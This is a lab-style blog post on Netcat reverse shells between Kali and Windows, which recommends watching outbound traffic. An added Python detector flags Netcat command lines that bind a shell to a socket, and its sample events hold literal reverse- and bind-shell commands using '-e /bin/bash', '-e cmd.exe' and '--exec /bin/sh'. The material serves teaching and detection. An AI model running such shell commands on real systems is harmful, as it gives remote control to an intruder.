
Friday, September 30, 2016

NETCAT / 3 - Reverse Shell


NETCAT REVERSE SHELL

- Layout topology for this exercise:


- In this case Netcat is used for remote administration, sending a reverse shell to a listening host. A reverse shell is useful when a router or firewall is present between the two hosts, because the managed host initiates the connection outward instead of accepting an inbound one.

- Because the remote shell is sent out across a corporate router or firewall, this exercise illustrates the recommendation that outgoing traffic from a network should be watched as carefully as incoming traffic.
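
On the monitoring side, the following is an added example (not part of the original post) that scans process-creation command lines for Netcat invocations that attach a program to a socket, as the `-e /bin/bash` and `-e cmd.exe` commands in this exercise do. The binary names, option sets and sample events are assumptions constructed for illustration, and the ncat long options `--exec`/`--sh-exec` and the listener case go beyond the two commands shown on this page.

```python
import shlex

# Assumed netcat binary names and option letters; extend for the builds in your estate.
NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "nc.traditional"}
EXEC_LONG = {"--exec", "--sh-exec"}   # ncat long forms of "run a program on connect"
VALUE_SHORT = set("epwsi")            # short options that consume the next argument

def classify(cmdline):
    """Return a finding for a netcat command line that binds a program to a socket."""
    try:
        argv = [a.strip('"') for a in shlex.split(cmdline, posix=False)]
    except ValueError:                # unbalanced quotes: fall back to naive split
        argv = cmdline.split()
    if not argv:
        return None
    exe = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in NETCAT_NAMES:
        return None
    program, listening, positional = None, False, []
    args = iter(argv[1:])
    for arg in args:
        if arg in EXEC_LONG:
            program = next(args, None)
        elif arg == "--listen":
            listening = True
        elif arg.startswith("-") and not arg.startswith("--") and len(arg) > 1:
            letters = arg[1:]         # clustered short flags such as -lvp
            listening = listening or "l" in letters
            if letters[-1] in VALUE_SHORT:
                value = next(args, None)
                if letters[-1] == "e":
                    program = value
        elif not arg.startswith("-"):
            positional.append(arg)
    if program is None:               # plain client or listener: no program attached
        return None
    kind = "bind shell (listener)" if listening else "reverse shell (outbound)"
    dest = None if listening or len(positional) < 2 else tuple(positional[-2:])
    return {"kind": kind, "program": program, "destination": dest}

# Constructed process-creation command lines (hosts are documentation addresses).
SAMPLE_EVENTS = [
    "nc -lvp 4444",
    "nc 192.0.2.10 4444 -e /bin/bash",
    r"C:\tools\nc.exe 192.0.2.20 4444 -e cmd.exe",
    "ncat --exec /bin/sh -l 4444",
    "curl https://example.org/",
]

def scan(events):
    """Return (command line, finding) pairs for every flagged event."""
    return [(e, f) for e in events if (f := classify(e))]
```

Findings with a destination can then be matched against firewall or proxy egress logs for the same host and port.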


3.1 - Reverse shell from Kali to Windows

- Windows is listening on port 4444:





- Kali sends a reverse shell (-e /bin/bash) to port 4444 on Windows, meaning that the shell's stdin, stdout and stderr are redirected to Windows instead of to the default console:










- As a consequence, after the connection is established, Windows has a command shell on Kali and can administer it remotely:




3.2 - Reverse shell from Windows to Kali


- In the same way as before, Kali is now listening on TCP port 4444:


- Windows sends a reverse shell (-e cmd.exe) to Kali on port 4444:


- As a consequence, Kali is able to administer Windows remotely, because a Windows command-line prompt is opened in its own console: